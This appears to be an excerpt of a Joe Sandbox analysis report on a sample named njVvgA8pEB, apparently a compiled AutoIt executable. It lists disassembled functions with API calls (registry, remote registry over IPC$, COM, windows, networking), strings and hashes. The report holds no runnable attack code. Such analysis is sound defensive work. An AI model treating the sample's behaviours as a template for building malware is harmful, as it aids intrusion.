                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                          • API String ID: 537147316-1018226102
                                                                          • Opcode ID: c5efaca4c9f576fc6c29920f4002f1460e186457e9e3b321593eeb3ab5898040
                                                                          • Instruction ID: 19afc0205af7cbb66c295e1a54c25d657a91a9613f7e352913c93383179b6782
                                                                          • Opcode Fuzzy Hash: c5efaca4c9f576fc6c29920f4002f1460e186457e9e3b321593eeb3ab5898040
                                                                          • Instruction Fuzzy Hash: E1029F311083409FC72AEF24D8919AFBBE5FF99314F14491DF4999B2A1DB30E989CB52
                                                                          Function 00372D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00372D50
                                                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00372DDD
                                                                          • GetMenuItemCount.USER32(003D5890), ref: 00372E66
                                                                          • DeleteMenu.USER32(003D5890,00000005,00000000,000000F5,?,?), ref: 00372EF6
                                                                          • DeleteMenu.USER32(003D5890,00000004,00000000), ref: 00372EFE
                                                                          • DeleteMenu.USER32(003D5890,00000006,00000000), ref: 00372F06
                                                                          • DeleteMenu.USER32(003D5890,00000003,00000000), ref: 00372F0E
                                                                          • GetMenuItemCount.USER32(003D5890), ref: 00372F16
                                                                          • SetMenuItemInfoW.USER32(003D5890,00000004,00000000,00000030), ref: 00372F4C
                                                                          • GetCursorPos.USER32(?), ref: 00372F56
                                                                          • SetForegroundWindow.USER32(00000000), ref: 00372F5F
                                                                          • TrackPopupMenuEx.USER32(003D5890,00000000,?,00000000,00000000,00000000), ref: 00372F72
                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00372F7E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                          • String ID:
                                                                          • API String ID: 3993528054-0
                                                                          • Opcode ID: 79352a9f5bb025f24aac8dbcae2b95e41539495114f37959bcf4b17e8d8ed234
                                                                          • Instruction ID: ee3e282fd10a09e4187376f2d0a8ce3b8caab77502629fc91ba37ef38429d0e4
                                                                          • Opcode Fuzzy Hash: 79352a9f5bb025f24aac8dbcae2b95e41539495114f37959bcf4b17e8d8ed234
                                                                          • Instruction Fuzzy Hash: BF71A071600205BEEB329F54DC85FABBFA8FB05364F148216F629AA1E1C7795C60DB90
                                                                          Function 003888AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 003888D7
                                                                          • CoInitialize.OLE32(00000000), ref: 00388904
                                                                          • CoUninitialize.OLE32 ref: 0038890E
                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00388A0E
                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00388B3B
                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,003A2C0C), ref: 00388B6F
                                                                          • CoGetObject.OLE32(?,00000000,003A2C0C,?), ref: 00388B92
                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00388BA5
                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00388C25
                                                                          • VariantClear.OLEAUT32(?), ref: 00388C35
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                          • String ID: ,,:
                                                                          • API String ID: 2395222682-824956042
                                                                          • Opcode ID: 14f0d7d9b7355e33b81177d3a41225efa0e5eaf96ad3657c89e983b1bca0df22
                                                                          • Instruction ID: 021a610ee548d0bd54fa930f1f286b7df5bb01ae4161771c410b24d5ce5b1f17
                                                                          • Opcode Fuzzy Hash: 14f0d7d9b7355e33b81177d3a41225efa0e5eaf96ad3657c89e983b1bca0df22
                                                                          • Instruction Fuzzy Hash: A1C133B1208305AFC706EF28C88496BB7E9FF89348F40495DF98A9B251DB71ED05CB52
                                                                          Function 003677DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          • _memset.LIBCMT ref: 0036786B
                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003678A0
                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003678BC
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003678D8
                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00367902
                                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0036792A
                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00367935
                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0036793A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                          • API String ID: 1411258926-22481851
                                                                          • Opcode ID: 146cdd2a368bf5f84102107b312873e823e659a98d8f947a3eb859413d716539
                                                                          • Instruction ID: a7d5884a97dd0ac9c091dc56dbc905c4dce115c1dd63a5d616ea5692e25ed15b
                                                                          • Opcode Fuzzy Hash: 146cdd2a368bf5f84102107b312873e823e659a98d8f947a3eb859413d716539
                                                                          • Instruction Fuzzy Hash: 86410972C1422DABCB26EBA4DC85DEEB7B8BF18354F444429F815A7161EB315D44CB90
                                                                          Function 00390E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038FDAD,?,?), ref: 00390E31
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                          • API String ID: 3964851224-909552448
                                                                          • Opcode ID: 90e32221fed54d4a6decfca740cf206feaf98cac6c428dc4a6914e87268f6053
                                                                          • Instruction ID: 7df06b82c5d85996b421744b1c813e99f654f55e7985556ad8b7ea4e01b762e5
                                                                          • Opcode Fuzzy Hash: 90e32221fed54d4a6decfca740cf206feaf98cac6c428dc4a6914e87268f6053
                                                                          • Instruction Fuzzy Hash: D7415B3650024A8FCF1BEF10E8A5BEF3764AF15340F160459FC565B6A2DB319E5ACBA0
                                                                          Function 0036F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0034E2A0,00000010,?,Bad directive syntax error,0039F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0036F7C2
                                                                          • LoadStringW.USER32(00000000,?,0034E2A0,00000010), ref: 0036F7C9
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          • _wprintf.LIBCMT ref: 0036F7FC
                                                                          • __swprintf.LIBCMT ref: 0036F81E
                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0036F88D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                          • API String ID: 1506413516-4153970271
                                                                          • Opcode ID: 604693f7e5ad4b3f985339b8247a7d7075f3cd077f4316705a557ed6283bee6c
                                                                          • Instruction ID: de264ac0ab2229ceb55d5eb4d5cc2543f69ccb81f35c5672dd12a97a9817c60e
                                                                          • Opcode Fuzzy Hash: 604693f7e5ad4b3f985339b8247a7d7075f3cd077f4316705a557ed6283bee6c
                                                                          • Instruction Fuzzy Hash: EB21613290421EEFCF17EF90CC4AEEE7779BF18300F044866F505AA0A1EA319A64DB51
                                                                          Function 003752C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                            • Part of subcall function 00317924: _memmove.LIBCMT ref: 003179AD
                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00375330
                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00375346
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00375357
                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00375369
                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0037537A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$_memmove
                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                          • API String ID: 2279737902-1007645807
                                                                          • Opcode ID: bfdd1695d2fb40c837de19d13260605ec9bc7c1187f50bb8ea03ef830eba1915
                                                                          • Instruction ID: 2035d951f3d87be780a3a69c6f179a480dd5320d50b2d20abbb7fef0536dacf3
                                                                          • Opcode Fuzzy Hash: bfdd1695d2fb40c837de19d13260605ec9bc7c1187f50bb8ea03ef830eba1915
                                                                          • Instruction Fuzzy Hash: 7911983195011979D72AB761CC49EFF7B7CEBD5B44F04081DB415E60E1EEA01D44CAA0
                                                                          Function 003746B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                          • String ID: 0.0.0.0
                                                                          • API String ID: 208665112-3771769585
                                                                          • Opcode ID: c560d4d889da2b301d577ddb18a8f63726ef28fcc62096e83cafe7e6f6073908
                                                                          • Instruction ID: 0bdfbb0faa44decd8efd56ee514d0c904e8d302a0caef300cc84155f06129032
                                                                          • Opcode Fuzzy Hash: c560d4d889da2b301d577ddb18a8f63726ef28fcc62096e83cafe7e6f6073908
                                                                          • Instruction Fuzzy Hash: 6711E7316041146FCB2BBB709C8AEDB77BCEF02711F0441BAF459DA0A1EF759E818A50
                                                                          Function 00374F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • timeGetTime.WINMM ref: 00374F7A
                                                                            • Part of subcall function 0033049F: timeGetTime.WINMM(?,75C0B400,00320E7B), ref: 003304A3
                                                                          • Sleep.KERNEL32(0000000A), ref: 00374FA6
                                                                          • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00374FCA
                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00374FEC
                                                                          • SetActiveWindow.USER32 ref: 0037500B
                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00375019
                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00375038
                                                                          • Sleep.KERNEL32(000000FA), ref: 00375043
                                                                          • IsWindow.USER32 ref: 0037504F
                                                                          • EndDialog.USER32(00000000), ref: 00375060
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                          • String ID: BUTTON
                                                                          • API String ID: 1194449130-3405671355
                                                                          • Opcode ID: 12a694fa2d78f429986a7084dd0a8bd45820b5e5f5c74f4ec1b8bcb4628d5d41
                                                                          • Instruction ID: cc7065178b25762f9eebbbc3bd48b912dcd76538f927387a56698ce5a629af1b
                                                                          • Opcode Fuzzy Hash: 12a694fa2d78f429986a7084dd0a8bd45820b5e5f5c74f4ec1b8bcb4628d5d41
                                                                          • Instruction Fuzzy Hash: 0D21F374206600AFE7235F30FC89B263B6EEB06745F05502AF009C11B4CB7A8E54CB61
                                                                          Function 0037D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • CoInitialize.OLE32(00000000), ref: 0037D5EA
                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0037D67D
                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 0037D691
                                                                          • CoCreateInstance.OLE32(003A2D7C,00000000,00000001,003C8C1C,?), ref: 0037D6DD
                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0037D74C
                                                                          • CoTaskMemFree.OLE32(?,?), ref: 0037D7A4
                                                                          • _memset.LIBCMT ref: 0037D7E1
                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0037D81D
                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0037D840
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0037D847
                                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0037D87E
                                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 0037D880
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                          • String ID:
                                                                          • API String ID: 1246142700-0
                                                                          • Opcode ID: e08c5b9219a3efd79592938d9991aeb7ab2d711c2e097188bf42da8930330ad7
                                                                          • Instruction ID: c2b89073a1966b765d02180bb3629b26b6c810f763439d49e6f328a67f9b5a97
                                                                          • Opcode Fuzzy Hash: e08c5b9219a3efd79592938d9991aeb7ab2d711c2e097188bf42da8930330ad7
                                                                          • Instruction Fuzzy Hash: 0BB10B75A00109AFDB15DFA4C885EAEBBB9FF48314F148469F909EB261DB31ED41CB50
                                                                          Function 0036C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000001), ref: 0036C283
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0036C295
                                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0036C2F3
                                                                          • GetDlgItem.USER32(?,00000002), ref: 0036C2FE
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0036C310
                                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0036C364
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0036C372
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0036C383
                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0036C3C6
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0036C3D4
                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0036C3F1
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0036C3FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                          • String ID:
                                                                          • API String ID: 3096461208-0
                                                                          • Opcode ID: 31b8867e4605bda15eaa267cc87eed4a8ae477181539aa0e87df5fcec099df39
                                                                          • Instruction ID: 3112e95dd8f284e835ee8ea6f1fce05c59a6e1530790f932ed9970d32a335665
                                                                          • Opcode Fuzzy Hash: 31b8867e4605bda15eaa267cc87eed4a8ae477181539aa0e87df5fcec099df39
                                                                          • Instruction Fuzzy Hash: 58517D71B00205AFDB09CFA9DD89ABEBBBAEB88310F14812DF915D7290D771DD008B10
                                                                          Function 0031201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00311B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00312036,?,00000000,?,?,?,?,003116CB,00000000,?), ref: 00311B9A
                                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003120D3
                                                                          • KillTimer.USER32(-00000001,?,?,?,?,003116CB,00000000,?,?,00311AE2,?,?), ref: 0031216E
                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0034BCA6
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003116CB,00000000,?,?,00311AE2,?,?), ref: 0034BCD7
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003116CB,00000000,?,?,00311AE2,?,?), ref: 0034BCEE
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003116CB,00000000,?,?,00311AE2,?,?), ref: 0034BD0A
                                                                          • DeleteObject.GDI32(00000000), ref: 0034BD1C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 641708696-0
                                                                          • Opcode ID: ed83f77f035e909fc61b25f0dcab4108d4cb07cdfe585a2e6c702c82e88c79e2
                                                                          • Instruction ID: d0a0aab3ec0e42e13b1edb4f34cd33d3e4742ca143a07c833650486ec3157268
                                                                          • Opcode Fuzzy Hash: ed83f77f035e909fc61b25f0dcab4108d4cb07cdfe585a2e6c702c82e88c79e2
                                                                          • Instruction Fuzzy Hash: 41617D31601A00DFDB3B9F14E948B6AB7F9FF49312F11452AE5428AA70C771BCA4EB50
                                                                          Function 003121A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 003125DB: GetWindowLongW.USER32(?,000000EB), ref: 003125EC
                                                                          • GetSysColor.USER32(0000000F), ref: 003121D3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ColorLongWindow
                                                                          • String ID:
                                                                          • API String ID: 259745315-0
                                                                          • Opcode ID: 52c846119423ce426ab540df10609a657d022f935c8da7e712907294343a0ab3
                                                                          • Instruction ID: 9998cb777883715d25b7c3117555693a03d06a02fe233fc9a5848150d07be6ec
                                                                          • Opcode Fuzzy Hash: 52c846119423ce426ab540df10609a657d022f935c8da7e712907294343a0ab3
                                                                          • Instruction Fuzzy Hash: 534194311005449FDB2B5F28EC88BFA3B69EB4A331F194266FD658E1E1C7328C92DB51
                                                                          Function 0037A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?,0039F910), ref: 0037A90B
                                                                          • GetDriveTypeW.KERNEL32(00000061,003C89A0,00000061), ref: 0037A9D5
                                                                          • _wcscpy.LIBCMT ref: 0037A9FF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
